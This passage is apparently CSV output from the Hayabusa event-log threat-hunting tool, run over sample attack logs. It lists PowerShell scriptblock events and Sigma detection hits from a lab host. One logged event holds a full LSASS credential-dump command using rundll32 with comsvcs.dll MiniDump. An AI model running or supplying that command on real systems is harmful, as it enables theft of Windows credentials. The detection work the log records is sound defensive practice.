Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:12.553 +00:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:13.725 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:22.291 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:39:26.224 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) "" # .Link # http://go.microsoft.com/fwlink/?LinkID=225750 # .ExternalHelp System.Management.Automation.dll-help.xml",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.240 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# Options include: RelativeFilePaths - [bool] Always resolve file paths using 
Resolve-Path -Relative. The default is to use some heuristics to guess if relative or absolute is better. To customize your own custom options, pass a hashtable to CompleteInput, e.g. return [System.Management.Automation.CommandCompletion]::CompleteInput($inputScript, $cursorColumn, @{ RelativeFilePaths=$false } #> [CmdletBinding(DefaultParameterSetName = 'ScriptInputSet')] Param( [Parameter(ParameterSetName = 'ScriptInputSet', Mandatory = $true, Position = 0)] [string] $inputScript, [Parameter(ParameterSetName = 'ScriptInputSet', Mandatory = $true, Position = 1)] [int] $cursorColumn, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 0)] [System.Management.Automation.Language.Ast] $ast, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 1)] [System.Management.Automation.Language.Token[]] $tokens, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 2)] [System.Management.Automation.Language.IScriptPosition] $positionOfCursor, [Parameter(ParameterSetName = 'ScriptInputSet', Position = 2)] [Parameter(ParameterSetName = 'AstInputSet', Position = 3)] [Hashtable] $options = $null ) End { if ($psCmdlet.ParameterSetName -eq 'ScriptInputSet') { return [System.Management.Automation.CommandCompletion]::CompleteInput( <#inputScript#> $inputScript, <#cursorColumn#> $cursorColumn, <#options#> $options) } else { return [System.Management.Automation.CommandCompletion]::CompleteInput( <#ast#> $ast, <#tokens#> $tokens, <#positionOfCursor#> $positionOfCursor, <#options#> $options) } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.240 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$space = New-Object System.Management.Automation.Host.BufferCell $space.Character = ' ' 
$space.ForegroundColor = $host.ui.rawui.ForegroundColor $space.BackgroundColor = $host.ui.rawui.BackgroundColor $rect = New-Object System.Management.Automation.Host.Rectangle $rect.Top = $rect.Bottom = $rect.Right = $rect.Left = -1 $origin = New-Object System.Management.Automation.Host.Coordinates $Host.UI.RawUI.CursorPosition = $origin $Host.UI.RawUI.SetBufferContents($rect, $space) # .Link # http://go.microsoft.com/fwlink/?LinkID=225747 # .ExternalHelp System.Management.Automation.dll-help.xml",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.240 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param([string[]]$paths) $OutputEncoding = [System.Console]::OutputEncoding if($paths) { foreach ($file in $paths) { Get-Content $file | more.com } } else { $input | more.com },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# .FORWARDHELPTARGETNAME Get-Help .FORWARDHELPCATEGORY Cmdlet #> [CmdletBinding(DefaultParameterSetName='AllUsersView', HelpUri='http://go.microsoft.com/fwlink/?LinkID=113316')] param( [Parameter(Position=0, ValueFromPipelineByPropertyName=$true)] [string] ${Name}, [string] ${Path}, [ValidateSet('Alias','Cmdlet','Provider','General','FAQ','Glossary','HelpFile','ScriptCommand','Function','Filter','ExternalScript','All','DefaultHelp','Workflow')] [string[]] ${Category}, [string[]] ${Component}, [string[]] ${Functionality}, [string[]] ${Role}, [Parameter(ParameterSetName='DetailedView', Mandatory=$true)] [switch] ${Detailed}, 
[Parameter(ParameterSetName='AllUsersView')] [switch] ${Full}, [Parameter(ParameterSetName='Examples', Mandatory=$true)] [switch] ${Examples}, [Parameter(ParameterSetName='Parameters', Mandatory=$true)] [string] ${Parameter}, [Parameter(ParameterSetName='Online', Mandatory=$true)] [switch] ${Online}, [Parameter(ParameterSetName='ShowWindow', Mandatory=$true)] [switch] ${ShowWindow}) #Set the outputencoding to Console::OutputEncoding. More.com doesn't work well with Unicode. $outputEncoding=[System.Console]::OutputEncoding Get-Help @PSBoundParameters | more",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# .FORWARDHELPTARGETNAME New-Item .FORWARDHELPCATEGORY Cmdlet #> [CmdletBinding(DefaultParameterSetName='pathSet', SupportsShouldProcess=$true, SupportsTransactions=$true, ConfirmImpact='Medium')] [OutputType([System.IO.DirectoryInfo])] param( [Parameter(ParameterSetName='nameSet', Position=0, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='pathSet', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [System.String[]] ${Path}, [Parameter(ParameterSetName='nameSet', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [AllowNull()] [AllowEmptyString()] [System.String] ${Name}, [Parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [System.Object] ${Value}, [Switch] ${Force}, [Parameter(ValueFromPipelineByPropertyName=$true)] [System.Management.Automation.PSCredential] ${Credential} ) begin { try { $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('New-Item', [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd -Type Directory @PSBoundParameters } $steppablePipeline = 
$scriptCmd.GetSteppablePipeline() $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } catch { throw } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param( [Parameter(ValueFromPipeline=$true)] [string[]] $verb = '*' ) begin { $allVerbs = [PSObject].Assembly.GetTypes() | Where-Object {$_.Name -match '^Verbs.'} | Get-Member -type Properties -static | Select-Object @{ Name='Verb' Expression = {$_.Name} }, @{ Name='Group' Expression = { $str = ""$($_.TypeName)"" $str.Substring($str.LastIndexOf('Verbs') + 5) } } } process { foreach ($v in $verb) { $allVerbs | Where-Object { $_.Verb -like $v } } } # .Link # http://go.microsoft.com/fwlink/?LinkID=160712 # .ExternalHelp System.Management.Automation.dll-help.xml",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[CmdletBinding()] param( [ValidateRange(2, 2147483647)] [int] ${Width}, [Parameter(ValueFromPipeline=$true)] [psobject] ${InputObject}) begin { try { $PSBoundParameters['Stream'] = $true $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('Out-String',[System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters } $steppablePipeline = $scriptCmd.GetSteppablePipeline($myInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } 
end { try { $steppablePipeline.End() } catch { throw } } <# .ForwardHelpTargetName Out-String .ForwardHelpCategory Cmdlet #>",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location A:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location B:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location C:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location D:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location E:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location F:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location G:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location H:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location I:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location J:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location 
K:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location L:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location M:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location N:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location O:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location P:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Q:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location R:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location S:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location T:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location U:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location V:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump 
with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location W:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location X:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Y:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Z:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location ..,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location \,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Read-Host 'Press Enter to continue...' | Out-Null,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.302 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$this.ServiceName,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.302 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[System.Management.ManagementDateTimeConverter]::ToDateTime($args[0]),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.302 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[System.Management.ManagementDateTimeConverter]::ToDmtfDateTime($args[0]),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.349 +00:00,FS03.offsec.lan,4104,info,,PwSh 
Scriptblock Log,"C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\vtnr8kff.dmp full;Wait-Process -Id (Get-Process rundll32).id",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.349 +00:00,FS03.offsec.lan,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.349 +00:00,FS03.offsec.lan,4104,low,Disc,Suspicious Process Discovery With Get-Process,,rules/sigma/powershell/powershell_script/posh_ps_susp_get_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.349 +00:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.396 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. 
All rights reserved."" ModuleVersion=""3.1.0.0"" PowerShellVersion=""3.0"" CLRVersion=""4.0"" NestedModules=""Microsoft.PowerShell.Commands.Management.dll"" HelpInfoURI = 'http://go.microsoft.com/fwlink/?linkid=285756' CmdletsToExport=@(""Add-Content"", ""Clear-Content"", ""Clear-ItemProperty"", ""Join-Path"", ""Convert-Path"", ""Copy-ItemProperty"", ""Get-EventLog"", ""Clear-EventLog"", ""Write-EventLog"", ""Limit-EventLog"", ""Show-EventLog"", ""New-EventLog"", ""Remove-EventLog"", ""Get-ChildItem"", ""Get-Content"", ""Get-ItemProperty"", ""Get-WmiObject"", ""Invoke-WmiMethod"", ""Move-ItemProperty"", ""Get-Location"", ""Set-Location"", ""Push-Location"", ""Pop-Location"", ""New-PSDrive"", ""Remove-PSDrive"", ""Get-PSDrive"", ""Get-Item"", ""New-Item"", ""Set-Item"", ""Remove-Item"", ""Move-Item"", ""Rename-Item"", ""Copy-Item"", ""Clear-Item"", ""Invoke-Item"", ""Get-PSProvider"", ""New-ItemProperty"", ""Split-Path"", ""Test-Path"", ""Get-Process"", ""Stop-Process"", ""Wait-Process"", ""Debug-Process"", ""Start-Process"", ""Remove-ItemProperty"", ""Remove-WmiObject"", ""Rename-ItemProperty"", ""Register-WmiEvent"", ""Resolve-Path"", ""Get-Service"", ""Stop-Service"", ""Start-Service"", ""Suspend-Service"", ""Resume-Service"", ""Restart-Service"", ""Set-Service"", ""New-Service"", ""Set-Content"", ""Set-ItemProperty"", ""Set-WmiInstance"", ""Get-Transaction"", ""Start-Transaction"", ""Complete-Transaction"", ""Undo-Transaction"", ""Use-Transaction"", ""New-WebServiceProxy"", ""Get-HotFix"", ""Test-Connection"", ""Enable-ComputerRestore"", ""Disable-ComputerRestore"", ""Checkpoint-Computer"", ""Get-ComputerRestorePoint"", ""Restart-Computer"", ""Stop-Computer"", ""Restore-Computer"", ""Add-Computer"", ""Remove-Computer"", ""Test-ComputerSecureChannel"", ""Reset-ComputerMachinePassword"", ""Rename-Computer"", ""Get-ControlPanelItem"", ""Show-ControlPanelItem"") 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.396 +00:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.396 +00:00,FS03.offsec.lan,4104,low,Disc,Suspicious Process Discovery With Get-Process,,rules/sigma/powershell/powershell_script/posh_ps_susp_get_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.396 +00:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.427 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Process): ""Get-Process"" ParameterBinding(Get-Process): name=""Name""; value=""lsass""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.427 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Process): ""Get-Process"" ParameterBinding(Get-Process): name=""Name""; 
value=""rundll32""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-21 16:27:02.319 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: cscript.exe //e:jscript testme.js | Process: C:\Windows\System32\cscript.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x779c2 | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:02.319 +00:00,LAPTOP-JU4M3I0E,1,medium,Exec,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:02.999 